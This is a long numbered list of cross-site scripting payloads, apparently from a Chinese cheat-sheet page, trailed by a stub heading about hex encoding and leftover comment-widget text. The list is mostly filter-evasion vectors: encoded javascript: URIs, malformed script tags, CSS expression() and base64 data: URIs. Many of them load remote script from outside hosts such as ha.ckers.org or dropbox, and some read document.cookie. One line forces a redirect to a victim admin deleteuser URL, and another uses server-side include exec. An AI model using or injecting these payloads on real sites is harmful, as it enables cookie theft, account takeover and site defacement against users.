  2072. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  2073. <IMG SRC="jav ascript:alert('XSS');">
  2074. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  2075. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  2076. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  2077. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  2078. <IMG SRC=" javascript:alert('XSS');">
  2079. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2080. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  2081. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2082. <<SCRIPT>alert("XSS");//<</SCRIPT>
  2083. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  2084. <SCRIPT SRC=//ha.ckers.org/.j>
  2085. <IMG SRC="javascript:alert('XSS')"
  2086. <iframe src=http://ha.ckers.org/scriptlet.html <
  2087. \";alert('XSS');//
  2088. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  2089. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  2090. <BODY BACKGROUND="javascript:alert('XSS')">
  2091. <IMG DYNSRC="javascript:alert('XSS')">
  2092. <IMG LOWSRC="javascript:alert('XSS')">
  2093. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  2094. <IMG SRC='vbscript:msgbox("XSS")'>
  2095. <IMG SRC="livescript:[code]">
  2096. <BODY ONLOAD=alert('XSS')>
  2097. <BGSOUND SRC="javascript:alert('XSS');">
  2098. <BR SIZE="&{alert('XSS')}">
  2099. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  2100. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  2101. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  2102. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  2103. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  2104. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  2105. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  2106. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  2107. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  2108. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  2109. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  2110. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  2111. <XSS STYLE="xss:expression(alert('XSS'))">
  2112. <XSS STYLE="behavior: url(xss.htc);">
  2113. ¼script¾alert(¢XSS¢)¼/script¾
  2114. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  2115. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  2116. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  2117. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  2118. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  2119. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  2120. <TABLE BACKGROUND="javascript:alert('XSS')">
  2121. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  2122. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  2123. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  2124. <DIV STYLE="background-image: url( javascript:alert('XSS'))">
  2125. <DIV STYLE="width: expression(alert('XSS'));">
  2126. <BASE HREF="javascript:alert('XSS');//">
  2127. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  2128. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  2129. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  2130. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  2131. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  2132. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  2133. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  2134. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  2135. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  2136. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2137. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2138. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2139. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2140. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2141. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2142. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  2143. <A HREF="http://66.102.7.147/">XSS</A>
  2144. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  2145. <A HREF="http://1113982867/">XSS</A>
  2146. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  2147. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  2148. <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
  2149. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  2150. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  2151. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  2152. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  2153. <img/src=`` onerror=this.onerror=confirm(1)
  2154. <form><isindex formaction="javascript&colon;confirm(1)"
  2155. <img src=``&NewLine; onerror=alert(1)&NewLine;
  2156. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  2157. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  2158. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  2159. <script /**/>/**/alert(1)/**/</script /**/
  2160. "><h1/onmouseover='\u0061lert(1)'>
  2161. <iframe/src="data:text/html,<svg onload=alert(1)>">
  2162. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  2163. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
  2164. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  2165. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  2166. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  2167. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  2168. </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
  2169. <img/ src=`~` onerror=prompt(1)>
  2170. <form><iframe src="javascript:alert(1)" ;>
  2171. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a
  2172. http://www.google<script .com>alert(document.location)</script
  2173. <a href=[�]" onmouseover=prompt(1)//">XYZ</a
  2174. <img/src=@ onerror = prompt('1')
  2175. <style/onload=prompt('XSS')
  2176. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  2177. </style ><script :-(>/**/alert(document.location)/**/</script :-(
  2178. �</form><input type="date" onfocus="alert(1)">
  2179. <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  2180. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  2181. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  2182. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  2183. <script ~~~>alert(0%0)</script ~~~>
  2184. <style/onload=&lt;!-- &gt; alert &lpar;1&rpar;>
  2185. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  2186. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  2187. "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  2188. <blink/ onmouseover=pr&#x6F;mpt(1)>OnMouseOver {Firefox & Opera}
  2189. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  2190. <div/style="width:expression(confirm(1))">X</div> {IE7}
  2191. <iframe// src=javaSCRIPT&colon;alert(1)
  2192. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  2193. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  2194. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  2195. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  2196. <a/href="javascript: javascript:prompt(1)"><input type="X">
  2197. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  2198. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  2199. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  2200. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  2201. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  2202. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  2203. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  2204. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  2205. <var onmouseover="prompt(1)">On Mouse Over</var>
  2206. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  2207. <img src="/" =_=" title="onerror='prompt(1)'">
  2208. <%<!--'%><script>alert(1);</script -->
  2209. <script src="data:text/javascript,alert(1)"></script>
  2210. <iframe/src \/\/onload = prompt(1)
  2211. <iframe/onreadystatechange=alert(1)
  2212. <svg/onload=alert(1)
  2213. <input value=<><iframe/src=javascript:confirm(1)
  2214. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  2215. http://www.<script>alert(1)</script .com
  2216. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  2217. <svg><script ?>alert(1)
  2218. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  2219. <img src=`xx:xx`onerror=alert(1)>
  2220. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  2221. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  2222. <math><a xlink:href="//jsfiddle.net/t846h/">click
  2223. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  2224. <svg contentScriptType=text/vbs><script>MsgBox+1
  2225. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  2226. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  2227. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  2228. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  2229. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  2230. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  2231. <script>+-+-1-+-+alert(1)</script>
  2232. <body/onload=&lt;!--&gt;&#10alert(1)>
  2233. <script itworksinallbrowsers>/*<script* */alert(1)</script
  2234. <img src ?itworksonchrome?\/onerror = alert(1)
  2235. <svg><script>//&NewLine;confirm(1);</script </svg>
  2236. <svg><script onlypossibleinopera:-)> alert(1)
  2237. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  2238. <script x> alert(1) </script 1=2
  2239. <div/onmouseover='alert(1)'> style="x:">
  2240. <--`<img/src=` onerror=alert(1)> --!>
  2241. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  2242. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  2243. "><img src=x onerror=window.open('https://www.google.com/');>
  2244. <form><button formaction=javascript&colon;alert(1)>CLICKME
  2245. <math><a xlink:href="//jsfiddle.net/t846h/">click
  2246. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  2247. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  2248. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

可用进制

  1. ASCII 16进制编码
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注